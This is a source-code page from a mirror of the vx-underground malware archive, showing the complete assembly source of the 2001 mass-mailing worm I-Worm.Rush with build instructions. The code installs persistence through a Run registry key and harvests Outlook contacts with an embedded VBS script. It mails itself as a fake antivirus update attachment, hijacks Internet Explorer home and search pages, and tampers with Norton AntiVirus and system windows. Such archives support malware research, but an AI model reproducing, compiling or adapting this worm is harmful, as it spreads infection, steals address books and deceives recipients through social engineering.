Mirrors/vxug-MalwareSourceCode
13
1
Fork 0
mirror of https://github.com/vxunderground/MalwareSourceCode synced 2024-06-16 12:08:36 +00:00
Code Releases Activity
d2cfd8ca7b
vxug-MalwareSourceCode/Win32/I-Worm.Rush.asm
vxunderground 1ffdfd1526
Add files via upload
2020-10-09 22:16:57 -05:00

498 lines
8.7 KiB
NASM
Raw Blame History

comment #
Name : I-Worm.Rush
Author : PetiK
Date : August 27th - September 2nd
Size : 5632 byte (compiled with UPX tool)
Action : Copy itself to
* WINDOWS\SYSTEM\Mail32.exe
Add in the key HKLM\Software\Microsoft\Windows\CurrentVersion\Run the value
* Mail Outlook = WINDOWS\SYSTEM\Mail32.exe
* On Wednesday it opens the cdrom
* The 3rd it produces a sound
* the 15th it alters "Search Page", "Start Page", and "Local Page" by
* Creates %personal%\Read_Me.txt with a text
* A vbs file search all email in the Oultook software and put them in the Mailbook.txt.
The worm scans the file to find email.
Subject : New Scan Virus...
Body : Hi man,
I send you the last update of ScanVir (v 2.5).
Look at the file attached.
Bye and have a nice day.
Attached : ScanVir_25.exe
* Scans title of windows :
- Norton AntiVirus => Norton Virus : W32.Norton.Worm@mm
- System Properties => Minimize the window
To build the worm:
@echo off
tasm32 /ml /m9 Rush
tlink32 -Tpe -c -x -aa Rush,,,import32,dllz
upx -9 Rush.exe
if exist *.obj del *.obj
if exist *.map del *.map
To delete the worm:
del %windir%\system\Mail32.exe
del %personal%\Read_Me.txt
del %windir%\MailBook.txt
#
.586p
.model flat
.code
JUMPS
callx macro a
extrn a:proc
call a
endm
include useful.inc
include myinclude.inc
start:
;call hide_worm
twin_worm:
push 50
mov esi,offset orig_worm
push esi
push 0
callx GetModuleFileNameA
mov edi,offset copy_worm
push edi
push 50
push edi
callx GetSystemDirectoryA
add edi,eax
mov eax,"iaM\"
stosd
mov eax,".23l"
stosd
mov eax,"exe"
stosd
pop edi
push 0
push edi
push esi
callx CopyFileA
push 8
push edi
push 1
@pushsz "Mail Outlook"
@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
push 80000002h
callx SHSetValueA
check_date:
push offset SystemTime
callx GetSystemTime
cmp [SystemTime.wDayOfWeek],03h
jne beep1
cdrom_open:
push 00h
push 00h
push 00h
@pushsz "open cdaudio"
callx mciSendStringA
push 00h
push 00h
push 00h
@pushsz "set cdaudio door open"
callx mciSendStringA
beep1: push offset SystemTime
callx GetSystemTime
cmp [SystemTime.wDay],03h
jne special_folder
mov counter,0
beep2: inc counter
push 30h
callx MessageBeep
push 1
callx Sleep
cmp counter,5000
jne beep2
special_folder:
push 00h
push 05h
push offset personal
push 00h
callx SHGetSpecialFolderPathA
@pushsz "\Read_Me.txt"
push offset personal
callx lstrcat
txt_file:
push 00h
push 01h
push 02h
push 00h
push 01h
push 40000000h
push offset personal
callx CreateFileA
mov [FileHdl],eax
push 00h
push offset octets
push TXTSIZE
push offset txtd
push [FileHdl]
callx WriteFile
push [FileHdl]
callx CloseHandle
vbs_file:
pushad
push 00h
push 80h
push 02h
push 00h
push 01h
push 40000000h
@pushsz "C:\rushhour.vbs"
callx CreateFileA
xchg edi,eax
push 00h
push offset octets
push VBSSIZE
push offset vbsd
push edi
callx WriteFile
push edi
callx CloseHandle
popad
push 1
@pushsz "wscript C:\rushhour.vbs"
callx WinExec
push 2000
callx Sleep
@pushsz "C:\rushhour.vbs"
callx DeleteFileA
push offset SystemTime
callx GetSystemTime
cmp [SystemTime.wDay],0Fh
jne start_scan
call internet_page
start_scan:
mov edi,offset mailbook
push edi
push 50
push edi
callx GetWindowsDirectoryA
add edi,eax
mov eax,"iaM\"
stosd
mov eax,"ooBl"
stosd
mov eax,"xt.k"
stosd
mov ax,"t"
stosd
xor eax,eax
stosd
open_scan_file:
pushad
push 00h
push 80h
push 03h
push 00h
push 01h
push 80000000h
push offset mailbook
callx CreateFileA
inc eax
je not_exist
dec eax
xchg eax,ebx
xor eax,eax
push eax
push eax
push eax
push 2
push eax
push ebx
callx CreateFileMappingA
test eax,eax
je F1
xchg eax,ebp
xor eax,eax
push eax
push eax
push eax
push 4
push ebp
callx MapViewOfFile
test eax,eax
je F2
xchg eax,esi
push 0
push ebx
callx GetFileSize
cmp eax,3
jbe F3
scan_file:
xor edx,edx
mov edi,offset mail_addr
push edi
p_c: lodsb
cmp al," "
je car_s
cmp al,0dh
je entr1
cmp al,0ah
je entr2
cmp al,"#"
je f_mail
cmp al,"@"
jne not_a
inc edx
not_a: stosb
jmp p_c
car_s: inc esi
jmp p_c
entr1: xor al,al
stosb
pop edi
test edx,edx
je scan_file
call send_mail
jmp scan_file
entr2: xor al,al
stosb
pop edi
jmp scan_file
f_mail:
F3: push esi
callx UnmapViewOfFile
F2: push ebp
callx CloseHandle
F1: push ebx
callx CloseHandle
not_exist:
popad
scan_window:mov counter,0
win1: inc counter
cmp counter,1000000
je end_w
@pushsz "Norton AntiVirus"
push 00h
callx FindWindowA
test eax,eax
jz win2
jmp change_nav
win2: @pushsz "System Properties"
push 00h
callx FindWindowA
test eax,eax
jz win3
jmp show_window
win3: @pushsz "Microsoft Home Page - Microsoft Internet Explorer"
push 00h
callx FindWindowA
test eax,eax
jz win1
jmp display_message
change_nav:
mov edi,eax
@pushsz "Norton Virus : W32.Norton.Worm@mm"
push edi
callx SetWindowTextA
jmp win1
show_window:
mov edi,eax
push 2
push edi
callx ShowWindow
jmp win1
display_message:
mov edi,eax
push 10h
@pushsz "Microsoft Internet Explorer"
@pushsz "You don't have access to this page"
push 00h
callx MessageBoxA
push 0
push edi
callx ShowWindow
jmp win1
end_w: push 00h
callx ExitProcess
hide_worm:
pushad
@pushsz "Kernel32.dll"
callx GetModuleHandleA
xchg eax,ecx
jecxz end_hide_worm
@pushsz "RegisterServiceProcess"
push ecx
callx GetProcAddress
xchg eax,ecx
jecxz end_hide_worm
push 1
push 0
call ecx
end_hide_worm:
popad
ret
internet_page:
pushad
call diff_val
db "Search Page",0
db "Start Page",0
db "Local Page",0
diff_val:
pop esi
push 3
pop ecx
page_loop:
push ecx
push 32
@pushsz "http://www.petik.fr.fm"
push 1
push esi
@pushsz "Software\Microsoft\Internet Explorer\Main"
push 80000001h
callx SHSetValueA
@endsz
pop ecx
loop page_loop
popad
ret
send_mail:
xor eax,eax
push eax
push eax
push offset Message
push eax
push [MAPIHdl]
callx MAPISendMail
ret
.data
; === copy_worm ===
orig_worm db 50 dup (0)
copy_worm db 50 dup (0)
; === beep ===
counter dd ?
; === special_folder ===
personal db 70 dup (0)
octets dd ?
FileHdl dd ?
; === scan email ===
mailbook db 50 dup (0)
mail_addr db 128 dup (?)
MAPIHdl dd 0
name_mail db "ScanVir_25.exe",0
subject db "New Scan Virus...",0
body db "Hi man,",0dh,0ah
db "I send you the last update of ScanVir (v 2.5).",0dh,0ah
db "Look at the file attached.",0dh,0ah,0dh,0ah
db 09h,09h,09h,09h,"Bye and have a nice day.",0
namefrom db "Your Best Friend",0
Message dd ?
dd offset subject
dd offset body
dd ?
dd ?
dd ?
dd 2
dd offset MsgFrom
dd 1
dd offset MsgTo
dd 1
dd offset Attach
MsgFrom dd ?
dd namefrom
dd ?
dd ?
dd ?
MsgTo dd ?
dd 1
dd offset mail_addr
dd offset mail_addr
dd ?
dd ?
Attach dd ?
dd ?
dd ?
dd offset orig_worm
dd offset name_mail
dd ?
txtd: db "Hi man,",0dh,0ah,0dh,0ah
db "I don't want to destroy your computer.",0dh,0ah
db "But other programs are more dangerous.",0dh,0ah,0dh,0ah,0dh,0ah
db 09h,09h,09h,"PetiK",00h
TXTSIZE equ $-txtd
vbsd: db 'On Error Resume Next',0dh,0ah
db 'Set rush=CreateObject("Outlook.Application")',0dh,0ah
db 'Set chan=rush.GetNameSpace("MAPI")',0dh,0ah
db 'Set fso=CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'Set txt=fso.CreateTextFile(fso.GetSpecialFolder(0)&"\MailBook.txt")',0dh,0ah
db 'txt.Close',0dh,0ah
db 'For Each M In chan.AddressLists',0dh,0ah
db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah
db 'For O=1 To M.AddressEntries.Count',0dh,0ah
db 'Set P=M.AddressEntries(O)',0dh,0ah
db 'Set txt=fso.OpenTextFile(fso.GetSpecialFolder(0)&"\MailBook.txt",8,true)',0dh,0ah
db 'txt.WriteLine P.Address',0dh,0ah
db 'txt.Close',0dh,0ah
db 'Next',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'Set txt=fso.OpenTextFile(fso.GetSpecialFolder(0)&"\MailBook.txt",8,true)',0dh,0ah
db 'txt.WriteLine "#"',0dh,0ah
db 'txt.Close',0dh,0ah
VBSSIZE equ $-vbsd
signature db "I-Worm.Rush",00h
origine db "A worm made in France",00h
author db "Written by PetiK - 2001",00h
end start
end
View Git Blame Copy Permalink